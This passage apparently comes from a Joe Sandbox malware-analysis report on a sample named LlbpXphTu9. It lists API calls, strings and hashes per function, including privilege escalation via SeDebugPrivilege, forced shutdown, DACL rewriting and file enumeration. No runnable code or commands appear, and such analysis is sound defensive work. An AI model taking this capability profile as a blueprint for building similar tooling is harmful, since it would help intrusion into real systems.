                                                                                                                                                                            • Instruction Fuzzy Hash: CA5166B2008344AAD720DBA4DC44FDF73E8AB85314F448D1EF68982141EB79D64CCBAA
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00434D75
                                                                                                                                                                            • __swprintf.LIBCMT ref: 00434D91
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00434D9B
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00434DB0
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00434DC5
                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00434DD7
                                                                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00434E0A
                                                                                                                                                                            • _memset.LIBCMT ref: 00434E27
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00434E3C
                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 00434E6F
                                                                                                                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00434EA9
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00434EB4
                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 00434EBB
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00434ECE
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcslen$CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                                                            • String ID: :$\$\??\%s
                                                                                                                                                                            • API String ID: 302090198-3457252023
                                                                                                                                                                            • Opcode ID: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                                                                                                                                                            • Instruction ID: 730b2dca1b6b09bd6b76555d3316dee95f4818bcffb97f26f8f03165767cfd2f
                                                                                                                                                                            • Opcode Fuzzy Hash: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                                                                                                                                                            • Instruction Fuzzy Hash: 30416676604340ABE330EB64DC49FEF73E8AFD8714F00891EF649921D1E7B4A645876A
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00444233: _wcslen.LIBCMT ref: 0044424E
                                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046449E
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 004644B4
                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 004644C8
                                                                                                                                                                            • OpenThreadToken.ADVAPI32(00000000), ref: 004644CF
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 004644E0
                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004644E7
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: OpenProcess$CurrentThreadToken$ErrorLast_wcslen
                                                                                                                                                                            • String ID: SeDebugPrivilege
                                                                                                                                                                            • API String ID: 1312810259-2896544425
                                                                                                                                                                            • Opcode ID: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                                                                                                                                            • Instruction ID: c3f5e6af55eb0da9fa74db60d4f5a84adac3a89a74612fbe59a223ef38337450
                                                                                                                                                                            • Opcode Fuzzy Hash: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                                                                                                                                            • Instruction Fuzzy Hash: 0E51A171200201AFD710DF65DD85F5BB7A8AB84704F10892EFB44DB2C1D7B8E844CBAA
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403871
                                                                                                                                                                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403887
                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 004038B2
                                                                                                                                                                              • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                                                                            • _wcscpy.LIBCMT ref: 004038C7
                                                                                                                                                                            • _wcscat.LIBCMT ref: 004038DC
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 004038EC
                                                                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                              • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                                                              • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                                                              • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                                                              • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,0040397D,?,?,00000010), ref: 00403F54
                                                                                                                                                                              • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,00000010), ref: 00403F8B
                                                                                                                                                                            • _wcscpy.LIBCMT ref: 004039C2
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00403A53
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00403AAA
                                                                                                                                                                            Strings
                                                                                                                                                                            • _, xrefs: 00403B48
                                                                                                                                                                            • #include depth exceeded. Make sure there are no recursive includes, xrefs: 0042B87B
                                                                                                                                                                            • Error opening the file, xrefs: 0042B8AC
                                                                                                                                                                            • Unterminated string, xrefs: 0042B9BA
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpy$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_wcscatstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                                                                                                            • API String ID: 4115725249-188983378
                                                                                                                                                                            • Opcode ID: e410348e96554644cb024ebf95e8b2d2088fffc0e8404256067a24ee959a0054
                                                                                                                                                                            • Instruction ID: dca64db042171ec5605b2d10b6a92a42a2076cc25022adee7b8115af8a15fc96
                                                                                                                                                                            • Opcode Fuzzy Hash: e410348e96554644cb024ebf95e8b2d2088fffc0e8404256067a24ee959a0054
                                                                                                                                                                            • Instruction Fuzzy Hash: 16D1D5B15083019AD710EF65C841AEB77E8AF95308F04492FF5C563292DB78DA49C7AB
                                                                                                                                                                            APIs
                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00434C12
                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00434C4F
                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 00434C65
                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00434C77
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00434C88
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00434C9C
                                                                                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00434CB7
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00434CFE
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(0048A090), ref: 00434D22
                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00434D2A
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00434D35
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00434D43
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                            • API String ID: 1409584000-438819550
                                                                                                                                                                            • Opcode ID: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                                                                                                                            • Instruction ID: 399dbb17912f16e5170155dcc5475d9346bc7ba5aa4a4c8a0ea4d4714b2c7a66
                                                                                                                                                                            • Opcode Fuzzy Hash: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                                                                                                                            • Instruction Fuzzy Hash: 4141D8726042086BD710EF64DC45AEFB3A8AAC9311F14592FFD54C3280EB79E915C7B9
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Timetime$Sleep
                                                                                                                                                                            • String ID: BUTTON
                                                                                                                                                                            • API String ID: 4176159691-3405671355
                                                                                                                                                                            • Opcode ID: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                                                                                                                            • Instruction ID: 32c89cc89acb3c111fc3cc5f781edb0c57d51ec263d79eeef99f8852f1a29925
                                                                                                                                                                            • Opcode Fuzzy Hash: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                                                                                                                            • Instruction Fuzzy Hash: CB21B7723843016BE330DB74FD4DF5A7B94A7A5B51F244876F600E6290D7A5D442876C
                                                                                                                                                                            APIs
                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,75918FB0,75918FB0,?,?,00000000), ref: 00442E40
                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?,00000000), ref: 00442EA4
                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,00000000), ref: 00442EB5
                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00442ED1
                                                                                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00442EF0
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00442F3B
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(0048A090,?,?,?,00000000), ref: 00442F6D
                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00442F75
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00442F80
                                                                                                                                                                              • Part of subcall function 00436D2D: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,75923220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,00000000), ref: 00442F92
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                            • API String ID: 2640511053-438819550
                                                                                                                                                                            • Opcode ID: 9379a40a392f11a7e453a238fddec55769e51d026bd73d4c4d0da232c8837110
                                                                                                                                                                            • Instruction ID: 5fd3b3f399b1dfd6b0a62b5043663bf11a2259675d3c80dc16c90576bc2ddb84
                                                                                                                                                                            • Opcode Fuzzy Hash: 9379a40a392f11a7e453a238fddec55769e51d026bd73d4c4d0da232c8837110
                                                                                                                                                                            • Instruction Fuzzy Hash: 0F41E8326083046BD620FA64DD85BEFB3A89BC5311F54492FF95483280E7FEA50D8779
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004392DE
                                                                                                                                                                              • Part of subcall function 004392BC: GetLastError.KERNEL32 ref: 004392E4
                                                                                                                                                                              • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043930B
                                                                                                                                                                              • Part of subcall function 0043928B: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004392A5
                                                                                                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,00000004,?,?,?,?), ref: 00445E4B
                                                                                                                                                                            • _memset.LIBCMT ref: 00445E61
                                                                                                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00445E83
                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00445E92
                                                                                                                                                                            • GetAce.ADVAPI32(?,00000000,?,?,00000018), ref: 00445EDE
                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00445EFB
                                                                                                                                                                            • GetLengthSid.ADVAPI32(?,?,00000018), ref: 00445F11
                                                                                                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?,?,00000000,?,00000000), ref: 00445F39
                                                                                                                                                                            • CopySid.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00445F40
                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?,?,00000000,?,00000000), ref: 00445F6E
                                                                                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?,00000000), ref: 00445F8B
                                                                                                                                                                            • SetUserObjectSecurity.USER32(?,?,?), ref: 00445FA0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3490752873-0
                                                                                                                                                                            • Opcode ID: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                                                                                                                            • Instruction ID: 491154c1e478dcf6c9ac3cbca3c2c9e2645d4ee7bbdc2abf5fae4ada557f6fe4
                                                                                                                                                                            • Opcode Fuzzy Hash: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                                                                                                                            • Instruction Fuzzy Hash: 85519D71108301ABD610DF61CD84E6FB7E9AFC9B04F04491EFA869B242D778E909C76B
                                                                                                                                                                            APIs
                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 0047AA03
                                                                                                                                                                            • CLSIDFromProgID.OLE32(00000000,?), ref: 0047AA27
                                                                                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,004829C0,?), ref: 0047AAAA
                                                                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0047AB6B
                                                                                                                                                                            • _memset.LIBCMT ref: 0047AB7C
                                                                                                                                                                            • _wcslen.LIBCMT ref: 0047AC68
                                                                                                                                                                            • _memset.LIBCMT ref: 0047ACCD
                                                                                                                                                                            • CoCreateInstanceEx.OLE32 ref: 0047AD06
                                                                                                                                                                            • CoSetProxyBlanket.OLE32(004829D0,?,?,?,?,?,?,00000800), ref: 0047AD53
                                                                                                                                                                            Strings
                                                                                                                                                                            • NULL Pointer assignment, xrefs: 0047AD84
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateInitializeInstance_memset$BlanketFromProgProxySecurity_wcslen
                                                                                                                                                                            • String ID: NULL Pointer assignment
                                                                                                                                                                            • API String ID: 1588287285-2785691316
                                                                                                                                                                            • Opcode ID: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                                                                                                                            • Instruction ID: 16786b45dbc5194aa398acfc0f0ff3b91b98a178c64a073a91da7f4e0cb75f58
                                                                                                                                                                            • Opcode Fuzzy Hash: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                                                                                                                            • Instruction Fuzzy Hash: 54B10DB15083409FD320EF65C881B9FB7E8BBC8744F108E2EF58997291D7759948CB66
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 004364B9
                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004364C0
                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004364D6
                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32 ref: 004364FE
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00436504
                                                                                                                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 00436527
                                                                                                                                                                            • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00436557
                                                                                                                                                                            • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 0043656A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                                                                                            • API String ID: 2938487562-3733053543
                                                                                                                                                                            • Opcode ID: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                                                                                                                            • Instruction ID: b625d7910520021a286729d09db348b3c4b0b131b75d5259d4bd29649b467962
                                                                                                                                                                            • Opcode Fuzzy Hash: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                                                                                                                            • Instruction Fuzzy Hash: E021D5B02803017FF7149B64DD4AF6B3398EB48B10F948829FE09852D2D6BDE844973D
                                                                                                                                                                            APIs
                                                                                                                                                                            • __swprintf.LIBCMT ref: 00436162
                                                                                                                                                                            • __swprintf.LIBCMT ref: 00436176
                                                                                                                                                                              • Part of subcall function 0041353A: __woutput_l.LIBCMT ref: 0041358F
                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 00436185
                                                                                                                                                                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 004361A6
                                                                                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 004361AE
                                                                                                                                                                            • LockResource.KERNEL32(00000000), ref: 004361B5
                                                                                                                                                                            • FindResourceW.KERNEL32(?,?,00000003), ref: 004361DA
                                                                                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 004361E4
                                                                                                                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 004361F0
                                                                                                                                                                            • LockResource.KERNEL32(?), ref: 004361FD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll__woutput_l
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2406429042-0
                                                                                                                                                                            • Opcode ID: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                                                                                                                            • Instruction ID: 79d88324f8a28cdfdddc37bd7103cac5134eefaeeaedb246b69d205017f9fa0d
                                                                                                                                                                            • Opcode Fuzzy Hash: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                                                                                                                            • Instruction Fuzzy Hash: 82313432104210BFD700EF64ED88EAF77A9FB89304F00882BFA4196150E778D940CB68
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D522
                                                                                                                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D593
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0045D59D
                                                                                                                                                                            • SetErrorMode.KERNEL32(?), ref: 0045D629
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                                            • API String ID: 4194297153-14809454
                                                                                                                                                                            • Opcode ID: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
